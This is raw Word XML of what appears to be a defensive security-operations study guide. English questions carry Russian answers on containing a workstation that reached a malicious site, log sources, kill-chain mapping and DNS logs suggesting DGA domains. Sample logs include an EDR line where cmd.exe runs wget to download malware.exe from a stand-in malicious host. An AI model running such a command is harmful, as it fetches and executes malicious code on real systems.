        <w:ind w:right="0" w:left="135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immediate actions would you take to contain the spread?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сдержать распространение потенциальной угрозы, выявленной корпоративным прокси-оповещением, указывающим на то, что рабочая станция подключена к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вредоносному сайту</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вам следует немедленно предпринять следующие действия:</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Изолируйте затронутую рабочую станцию.</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Отключиться от сети : немедленно отключить рабочую станцию ​​от корпоративной сети, чтобы предотвратить дальнейшую связь с вредоносными сайтами или серверами управления и контроля (C2). Этого можно добиться следующими способами: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Отключение сетевого интерфейса (проводного или беспроводного).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инструментов управления сетевым доступом (NAC) для блокировки устройства в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физически отключите сетевой кабель.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Сохраняйте доказательства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Документируйте инцидент : запишите подробности об оповещении, включая временную метку, URL-адрес, к которому был получен доступ, и любые соответствующие записи журнала. Обратите внимание на любые аномалии, наблюдаемые на рабочей станции.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Снимайте системные снимки : если возможно, фиксируйте текущее состояние рабочей станции, включая дампы памяти и образы дисков, чтобы помочь в криминалистическом анализе. Используйте такие инструменты, как FTK Imager или EnCase.</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Провести предварительное расследование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прокси-сервера : изучите журналы прокси-сервера, чтобы понять характер подключения к вредоносному сайту. Найдите дополнительные сведения, такие как переданные данные, IP-адреса назначения и любую связанную активность пользователя.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Осмотрите рабочую станцию : Осмотрите рабочую станцию ​​на предмет признаков взлома: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Процессы : проверьте наличие необычных или неизвестных запущенных процессов.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Сетевые подключения : проверьте активные сетевые подключения и любые установленные ссылки на подозрительные IP-адреса.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Файловая система : найдите недавно созданные или измененные файлы, которые могут быть связаны с вредоносным ПО.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Запустите сканирование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Выполните антивирусное сканирование : запустите полное сканирование системы с помощью корпоративного антивирусного решения, чтобы обнаружить и удалить любые вредоносные программы, которые могли быть загружены или запущены.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Используйте средства защиты от вредоносного ПО : используйте дополнительные средства защиты от вредоносного ПО или расширенные решения по обнаружению угроз для выявления и устранения угроз, которые не могут быть обнаружены стандартным антивирусным программным обеспечением.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Оцените утечку данных или боковое перемещение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исходящего трафика : проверьте наличие необычного исходящего трафика или признаков утечки данных, исходящих с затронутой рабочей станции.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Оцените боковое движение : расследуйте, распространилась ли угроза на другие системы или сегменты сети. Ищите подозрительные попытки входа или несанкционированный доступ.</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Уведомление и координация действий с соответствующими командами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Предупредите группу реагирования на инциденты : сообщите группе реагирования на инциденты или группе обеспечения безопасности о необходимости начать официальное расследование и процесс реагирования.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Координируйте действия со службой ИТ-поддержки : работайте совместно со службой ИТ-поддержки, чтобы обеспечить надлежащее обслуживание рабочей станции и избежать любых действий, которые могут еще больше поставить под угрозу систему.</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Обновите меры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политики безопасности : проверьте и обновите политики безопасности, связанные с доступом в Интернет и просмотром веб-страниц, чтобы предотвратить подобные инциденты в будущем.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Применяйте исправления безопасности : убедитесь, что все системы обновлены и исправлены, чтобы закрыть все уязвимости, которые могли быть использованы.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Повторная интеграция и мониторинг рабочей станции.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Очистка и повторное создание образа : после локализации и устранения угрозы повторно создайте образ рабочей станции или восстановите ее из заведомо работоспособной резервной копии, чтобы убедиться в ее чистоте и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Повторное подключение к сети : как только рабочая станция будет подтверждена как чистая и безопасная, повторно подключите ее к корпоративной сети с дополнительным мониторингом.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9. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Проведение послеаварийного обзора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Проанализируйте инцидент : выполните анализ первопричин, чтобы понять, как рабочая станция получила доступ к вредоносному сайту и какие уязвимости или слабые места были использованы.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Улучшение защиты : используйте информацию, полученную в ходе инцидента, для повышения уровня безопасности, обновления данных об угрозах и совершенствования возможностей обнаружения и реагирования.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10. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Обучайте пользователей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Проведите обучение : используйте инцидент в качестве примера для обучения сотрудников правилам безопасного просмотра веб-страниц, распознавания попыток фишинга и сообщения о подозрительной активности.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Оперативно изолировав зараженную рабочую станцию, сохранив доказательства, выполнив сканирование и координируя действия с соответствующими группами, вы сможете эффективно сдержать распространение угрозы и снизить риск дальнейшего ущерба.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="135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which system you can try to get additional information?</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реагировании на оповещение о том, что рабочая станция подключилась к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вредоносному сайту</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вы можете собрать дополнительную информацию из нескольких систем, чтобы помочь в расследовании и сдерживании. Вот разбивка того, где искать дополнительные подробности:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="720" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
      </w:pP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Корпоративные журналы прокси-серверов</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Подробности о доступе : Проверьте журналы прокси-сервера на предмет информации о доступном URL, временной метке и любой связанной активности пользователя. Найдите шаблоны или дополнительные связи с соответствующими вредоносными сайтами.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Передача данных : выясните, были ли переданы какие-либо данные во время подключения к вредоносному сайту, что может указывать на потенциальную утечку данных.</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Система обнаружения и реагирования на конечные точки (EDR)</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Активность процесса : проверка запущенных процессов, новых или подозрительных процессов и любых недавних изменений. Инструменты EDR часто предоставляют подробную информацию о процессах и действиях на рабочей станции.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Изменения файлов : проверьте наличие новых или измененных файлов, особенно в системных каталогах или временных папках, которые могут указывать на вредоносную активность.</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Сетевая активность : просмотрите сетевые подключения и данные исходящего трафика, чтобы узнать, были ли какие-либо соединения с известными вредоносными IP-адресами или доменами.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Журналы антивируса</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вредоносного ПО : просмотрите журналы антивируса для получения подробной информации об обнаружении вредоносного ПО, включая тип вредоносного ПО, место его обнаружения и то, было ли оно успешно удалено или помещено в карантин.</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Неудачные попытки : обратите внимание на любые неудачные попытки удалить или поместить вредоносное ПО в карантин, которые могут указывать на более постоянную угрозу.</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Система управления информацией и событиями безопасности (SIEM)</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Корреляция с другими событиями : используйте SIEM для корреляции оповещений прокси-сервера с другими событиями безопасности в сети, такими как попытки входа в систему, доступ к конфиденциальным файлам или необычный сетевой трафик.</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История событий : анализ исторических данных и событий, связанных с рабочей станцией и учетной записью пользователя, для выявления любых предшествующих признаков компрометации или подозрительной активности.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Журналы сетевого брандмауэра</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Исходящий трафик : изучите журналы брандмауэра на предмет сведений об исходящем трафике с рабочей станции, которые могут выявить дополнительные соединения с вредоносными IP-адресами или доменами.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Заблокированные соединения : найдите все соединения, заблокированные брандмауэром, что может указывать на попытки доступа к вредоносным сайтам или взаимодействия с серверами C2.</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Журналы событий Windows</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События безопасности : просмотрите журналы событий безопасности (идентификатор события 4624 для входов в систему, 4648 для попыток входа в систему, 4672 для использования привилегий), чтобы выявить любые необычные действия по входу в систему или повышения привилегий во время инцидента.</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приложений и системы : проверьте журналы приложений и системы на наличие ошибок или предупреждений, относящихся к времени инцидента, которые могут дать подсказки об изменениях или сбоях в системе.</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Журналы Active Directory (если применимо)</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Активность пользователя : проверьте журналы на предмет недавних изменений в учетной записи пользователя, связанной с рабочей станцией, включая изменения членства в группах или историю входов в систему.</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Попытки аутентификации : обратите внимание на любые необычные попытки аутентификации или неудачные попытки входа с рабочей станции в другие системы.</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Журналы системы обнаружения вторжений (IDS) или системы предотвращения вторжений (IPS)</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трафик : просмотрите журналы IDS/IPS на предмет любых оповещений или обнаружений, связанных с IP-адресом рабочей станции или любым взаимодействием с известными вредоносными IP-адресами.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аномалий : проанализируйте любые отмеченные аномалии или подозрительные закономерности в сетевом трафике, которые могут быть связаны с инцидентом.</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9. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Система физической безопасности (если применимо)</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доступа : проверьте журналы физического доступа на предмет необычной активности или доступа к рабочей станции во время инцидента.</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Записи с камер видеонаблюдения : если таковые имеются, просмотрите записи с камер видеонаблюдения, чтобы определить, были ли случаи несанкционированного физического доступа к рабочей станции.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10. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Система управления реагированием на инциденты</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Подробности дела : обратитесь к системе управления реагированием на инциденты для получения информации о текущих расследованиях или связанных инцидентах, которые могут предоставить контекст или дополнительную информацию о текущем оповещении.</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Действия по реагированию : просмотрите задокументированные действия по реагированию и результаты аналогичных инцидентов в прошлом, чтобы получить представление об эффективных стратегиях смягчения последствий.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="72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Сбор информации из этих систем помогает сформировать всестороннее понимание инцидента, что позволяет более эффективно локализовать, устранить последствия и предотвратить будущие угрозы.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="1350" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="135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Which stage of the “kill chain” attack this case is?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="1276" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>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 контексте подключения рабочей станции к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вредоносному сайту</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вы можете сопоставить это событие с определенным этапом модели атаки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">«kill chain». </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Модель kill chain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это структура, используемая для понимания и разбиения фаз кибератаки. Вот как подключение к вредоносному сайту вписывается в этапы kill chain:</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Этапы цепочки убийств</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Разведка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Вооружение</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Доставка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Эксплуатация</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Установка</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Командование и контроль (C2)</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Действия по целям</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Картографирование соединения с вредоносным сайтом</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Разведка</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Неприменимо : Этот этап включает сбор информации о цели до начала атаки. Подключение к вредоносному сайту не является частью фазы разведки.</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Вооружение</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Неприменимо : Этот этап включает создание оружия (например, вредоносного ПО), которое будет использоваться в атаке. Связь с вредоносным сайтом не имеет прямого отношения к созданию оружия.</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Доставка</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Возможно применимо : этот этап включает доставку оружия к цели. Подключение к вредоносному сайту может быть потенциально частью механизма доставки, если сайт используется для распространения вредоносного ПО или наборов эксплойтов. Например, если сайт используется для загрузки вредоносных полезных нагрузок или эксплуатации уязвимостей, он вписывается в фазу доставки.</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Эксплуатация</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Неприменимо напрямую : Эксплуатация подразумевает выполнение кода или использование уязвимостей в целевой системе. Сам по себе акт подключения к вредоносному сайту не обязательно подразумевает использование уязвимости, хотя это может быть связано, если сайт используется для эксплуатации системы.</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Установка</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Возможно применимо : если вредоносный сайт используется для загрузки и установки вредоносного ПО или инструментов, то он может быть задействован в фазе установки. Однако простое подключение к сайту не подтверждает установку без дополнительных доказательств выполнения вредоносной нагрузки.</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Командование и контроль (C2)</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Возможно применимо : если вредоносный сайт служит сервером управления и контроля (C2) для управления действиями скомпрометированных систем или если соединение устанавливает постоянную ссылку для дальнейших вредоносных команд, этот этап может быть актуален.</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Действия по целям</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Неприменимо : На этом этапе злоумышленник выполняет свои конечные цели, такие как эксфильтрация данных, уничтожение или нарушение. Само по себе подключение к вредоносному сайту не указывает напрямую на действия по целям.</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Учитывая информацию о том, что рабочая станция подключена к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вредоносному сайту</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наиболее важными этапами в цепочке уничтожения будут:</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Доставка : Если сайт используется для доставки вредоносного ПО или инструментов для эксплуатации уязвимостей.</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Установка : Если целью сайта было инициировать загрузку и установку вредоносного ПО.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="1276"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Командование и управление (C2) также может быть актуальным, если сайт используется для постоянной связи со скомпрометированной системой.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="1276" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="1276"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Без дополнительных доказательств таких действий, как загрузка вредоносного ПО, эксплуатация уязвимостей или подключение к серверу C2, основным этапом, определяемым по простому подключению к вредоносному сайту, будет Доставка .</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="1276" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="1276" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>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system is the following log from and what could you tell about it?</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определить источник и значимость журнала, мне нужно увидеть фактические детали журнала. Однако я могу подсказать вам, как интерпретировать типичные журналы из различных систем и какую информацию они могут предоставить:</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Распространенные типы журналов и их источники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прокси-сервера</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посещенные URL-адреса, временные метки, IP-адреса пользователей и коды статуса.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Предоставленная информация : указывает на закономерности веб-трафика, потенциальный доступ к вредоносным сайтам и может помочь определить активность пользователя и поведение в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14:23:45 | User IP: 192.168.1.10 | URL: </w:t>
      </w:r>
      <w:hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="docRId0">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
            <w:color w:val="00B050"/>
            <w:spacing w:val="0"/>
            <w:position w:val="0"/>
            <w:sz w:val="22"/>
            <w:u w:val="single"/>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:rPr>
          <w:t xml:space="preserve">http://malicious-site.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> | Status: 200 OK</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брандмауэра</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IP-адреса источника и назначения, порты, протоколы, предпринятые действия (разрешить/запретить) и временные метки.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Предоставленная информация : показывает сетевой трафик, проходящий через брандмауэр, включая любые заблокированные или разрешенные соединения. Полезно для обнаружения попыток несанкционированного доступа или сетевых атак.</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14:24:01 | Source IP: 192.168.1.10 | Destination IP: 203.0.113.5 | Port: 80 | Action: Blocked</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антивируса</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события обнаружения, названия вредоносных программ, пути к файлам и предпринятые действия (карантин/удаление).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Предоставленная информация : Подробности об обнаруженных угрозах на конечных точках, включая типы вредоносных программ и местоположения файлов. Полезно для понимания того, какие угрозы были обнаружены и как они были обработаны.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14:25:30 | Detection: Trojan.Agent | File Path: C:\Users\user\Downloads\malware.exe | Action: Quarantined</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обнаружения и реагирования конечной точки (EDR)</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активность процесса, изменения файлов, сетевые подключения и действия пользователя.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Предоставленная информация : предлагает подробные сведения о поведении конечной точки, включая подозрительные действия и изменения. Крайне важно для глубокого расследования потенциальных компрометаций.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14:26:15 | Process: cmd.exe | Action: Executed | Command: wget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http://malicious-site.com/malware.exe</w:t>
        </w:r>
      </w:hyperlink>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управления информацией и событиями безопасности (SIEM)</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коррелированные события безопасности из различных источников, включая оповещения, сетевую активность и поведение пользователя.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Предоставляемая информация : Объединяет и сопоставляет данные из нескольких систем для предоставления более широкого представления о событиях безопасности. Полезно для выявления закономерностей и обнаружения сложных атак.</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14:27:00 | Alert: Possible Data Exfiltration | Source IP: 192.168.1.10 | Destination IP: 198.51.100.10 | Event: High Volume Outbound Traffic</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операционной системы (ОС)</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Типичное содержимое : системные события, входы пользователей в систему, доступ к файлам и системные ошибки.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Предоставленная информация : Подробная информация о системных операциях и действиях пользователей, которая может помочь в диагностике системных проблем или обнаружении подозрительного поведения.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Пример :Timestamp: 2024-08-12 14:28:05 | Event: User Logon | User: admin | IP Address: 192.168.1.10 | Status: Successful</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относится к инструменту мониторинга сетевого трафика или журналам отладки DNS Windows . Он</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временную метку, когда событие было зафиксировано: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идентификатор конкретной записи журнала или события.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связана с событием сетевого пакета, которое может быть отправкой, получением или обработкой пакета.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По-видимому, это адрес памяти или ссылка в системе регистрации или приложении, используемая внутри системы для отслеживания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использует протокол UDP (протокол пользовательских датаграмм), который, помимо прочего, обычно применяется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то, что пакет был отправлен из источника.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IP-адрес устройства, отправившего пакет. IP-адрес 10.10.x.x</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это частный, внутренний IP, вероятно, из корпоративной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либо исходный порт, либо идентификатор транзакции, связанный с DNS-запросом.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 связанный с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указывать на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Прямой ответ</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или связанный с ним флаг статуса.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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Указывает, что запрошенное доменное имя не существует. Это стандартный код ответа DNS, когда запрошенный домен не может быть найден.</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запрос записи DNS-указателя (PTR), обычно используемый для обратного поиска DNS, где IP-адрес преобразуется в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доменное имя, которое пытался разрешить обратный DNS-поиск.</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 чем говорит нам эта запись в журнале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Система 10.10.160.208попыталась выполнить обратный DNS-поиск для домена, связанного с IP-адресом, но домен mggw-at-f3f0c6e992b7562598d9865b6fe8b3a6.comне существует, как указано в NXDOMAINответе. Это означает, что запрошенный сервер доменных имен ответил, что доменное имя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Потенциальное значение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Необычный домен : рассматриваемое доменное имя ( mggw-at-f3f0c6e992b7562598d9865b6fe8b3a6.com), по-видимому, сгенерировано автоматически, возможно, с помощью DGA (алгоритма генерации домена), который обычно используется вредоносным ПО для подключения к серверам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 внутренний IP-адрес 10.10.160.208, скорее всего, принадлежит устройству в вашей корпоративной сети. Тот факт, что он отправляет DNS-запросы на подозрительный или несуществующий домен, может указывать на скомпрометированную систему или неправильно настроенное приложение.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Следующие шаги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Изучите исходный IP-адрес (10.10.160.208) : просмотрите журналы активности устройства с этим IP-адресом, чтобы определить, почему оно пыталось разрешить этот подозрительный домен.</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на наличие вредоносного ПО : запустите антивирусную проверку на наличие вредоносного ПО на устройстве, чтобы проверить его на наличие инфекций, которые могут вызывать отправку DNS-запросов к подозрительным или несуществующим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 Наблюдайте за сетевым трафиком с этого устройства, чтобы увидеть, пытается ли оно подключиться к другим подозрительным доменам или проявляет другое аномальное поведение.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 проверьте журналы DNS на наличие похожих запросов с других устройств, которые могут указывать на более масштабную проблему или заражение.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в журнале предполагает неудачную попытку устройства в вашей сети разрешить потенциально вредоносный или автоматически сгенерированный домен. Такое поведение часто связано с попытками вредоносного ПО связаться с серверами C2, что делает критически важным дальнейшее расследование для обеспечения безопасности сети.</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содержит информацию о конкретном сетевом событии, связанном с активностью DNS. Вот подробное описание того, что указывает каждая часть журнала и что вы можете из этого вывести:</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внутренний идентификатор или идентификатор события, специфичный для системы регистрации.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связана с сетевым пакетом, в частности с DNS-запросом или ответом.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ссылка на память в системе, зарегистрировавшей событие, часто используемая для внутреннего отслеживания.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использует протокол пользовательских датаграмм (UDP), который обычно применяется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IP-адрес устройства, инициировавшего DNS-запрос. Он входит в диапазон частных IP-адресов, что предполагает, что он находится в корпоративной или частной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либо исходный порт, используемый для UDP-соединения, либо идентификатор транзакции DNS, связанный с этим конкретным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Идентификатор транзакции DNS, связанный с этим конкретным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Возможно, указывает на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Прямой ответ</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или может быть частью определенных используемых флагов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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">это код ответа DNS, означающий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указывающий на то,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означает запись указателя (PTR), используемую для обратного поиска DNS, где IP-адрес преобразуется в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доменное имя, которое пытался разрешить обратный DNS-поиск.</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 чем говорит нам эта запись в журнале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Внутреннее устройство с IP-адресом 10.10.160.208предприняло попытку обратного поиска DNS для преобразования IP-адреса в домен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DNS-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">сервер ответил NXDOMAIN, что запрошенный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 mggw-at-0d597695fbacb291dd5ad6400c808b3c.comпо-видимому, сгенерирован случайным образом, возможно, с помощью алгоритма генерации домена (DGA). DGA часто используются вредоносными программами для создания псевдослучайных доменных имен для связи с серверами управления и контроля (C2), что затрудняет блокировку этих коммуникаций.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IP-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">адрес 10.10.160.208принадлежит устройству в вашей внутренней сети. Тот факт, что он запрашивает потенциально вредоносный или несуществующий домен, предполагает, что он может быть скомпрометирован или приложение на нем неправильно настроено.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Следующие шаги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исходный IP-адрес (10.10.160.208)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устройство : определите устройство, связанное с этим IP-адресом, и расследуйте недавнее необычное поведение или признаки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Антивирусное сканирование : запустите комплексное сканирование устройства на наличие вредоносных программ, чтобы обнаружить любые потенциальные заражения, которые могут генерировать такие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шаблонов : Поиск похожих ответов NXDOMAIN, связанных с подозрительными или случайно сгенерированными доменами на других устройствах. Это может помочь определить, скомпрометированы ли также другие устройства.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другие запросы : проверьте, выполняло ли это устройство другие подозрительные DNS-запросы, особенно к доменам, помеченным как вредоносные.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Исходящие соединения : используйте инструменты сетевого мониторинга для отслеживания любого необычного исходящего трафика с устройства. Это может включать попытки связаться с другими подозрительными доменами или внешними IP-адресами.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Изоляция : в зависимости от результатов проверки рассмотрите возможность изоляции устройства от сети до тех пор, пока не будет подтверждено, что оно чистое.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любых оповещений или необычной активности в решении по безопасности конечных точек (например, EDR), установленном на устройстве, чтобы собрать больше информации о его поведении.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сообщите об этом вышестоящему органу : если устройство демонстрирует признаки взлома, сообщите о проблеме своей группе реагирования на инциденты, чтобы локализовать и устранить угрозу.</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посмотрите, коррелирует ли этот инцидент с другими текущими оповещениями или инцидентами безопасности, особенно с теми, которые связаны с вредоносным ПО или коммуникацией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10.10.160.208может пытаться разрешить домен, вероятно, связанный с вредоносной активностью. Такое поведение требует дальнейшего расследования, включая тщательное сканирование устройства и мониторинг его сетевого трафика, чтобы убедиться, что оно не было скомпрометировано.</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журнала,  показывает событие, связанное с DNS, когда устройство в вашей сети пыталось выполнить обратный поиск DNS. Ниже приведена подробная разбивка и интерпретация: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внутренний идентификатор или порядковый номер данного конкретного события в системе журналов.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то, что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используемый внутри системы, часто для отслеживания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IP-адрес устройства в вашей внутренней сети,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 связанный с этим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Возможно, флаг состояния, указывающий на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Прямой ответ</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или связанный флаг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доменное имя, которое система попыталась разрешить с помощью обратного поиска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 чем говорит нам эта запись в журнале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Неудачный обратный DNS-поиск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10.10.160.208попыталось преобразовать IP-адрес в доменное имя ( mggw-at-4780918bd4bdb423eff6618b7df90e71.com) через обратный DNS-запрос. DNS-сервер ответил NXDOMAIN, что указывает на то, что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или автоматически сгенерированный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автоматически, возможно, с помощью алгоритма генерации доменов (DGA). DGA часто используются вредоносными программами для динамического создания доменных имен для серверов управления и контроля (C2), что затрудняет блокировку этих соединений.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10.10.160.208является частью вашей внутренней сети, и тот факт, что оно пытается разрешить подозрительный домен, может указывать на то, что оно либо взломано, либо на нем запущено неправильно настроенное приложение.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Следующие шаги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устройство : определите, какое устройство соответствует IP-адресу, и проверьте его на наличие недавних необычных действий или признаков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проведите тщательное сканирование устройства на наличие вредоносного ПО, чтобы обнаружить любые инфекции, которые могут генерировать подозрительные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похожих запросов : найдите в журналах DNS похожие ответы NXDOMAIN, связанные с подозрительными доменами. Если несколько устройств делают похожие запросы, это может указывать на более масштабное заражение.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шаблонов : поиск шаблонов в DNS-запросах с этого устройства, особенно к доменам со схожими характеристиками (например, автоматически сгенерированные имена).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Исходящие соединения : отслеживайте сетевой трафик устройства на предмет необычных исходящих соединений, особенно попыток подключения к известным вредоносным IP-адресам или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изолируйте : если есть доказательства того, что устройство взломано, рассмотрите возможность его изоляции от сети до тех пор, пока проблема не будет решена.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проверьте наличие оповещений или необычных действий, зарегистрированных вашим решением по обеспечению безопасности конечных точек на этом устройстве.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Эскалация : если вы подозреваете, что устройство взломано, передайте проблему своей группе реагирования на инциденты для дальнейшего расследования и локализации.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проверьте, коррелирует ли это событие с другими оповещениями безопасности, особенно с теми, которые связаны с подозрительной активностью DNS или заражением вредоносным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в журнале предполагает, что устройство 10.10.160.208может пытаться разрешить домены, которые потенциально связаны с вредоносной деятельностью. Структура доменного имени и ответ NXDOMAIN указывают на возможность вредоносной активности, в частности, использования алгоритма генерации домена (DGA). Это требует дальнейшего изучения и мониторинга устройства и его сетевого трафика, чтобы убедиться, что они не 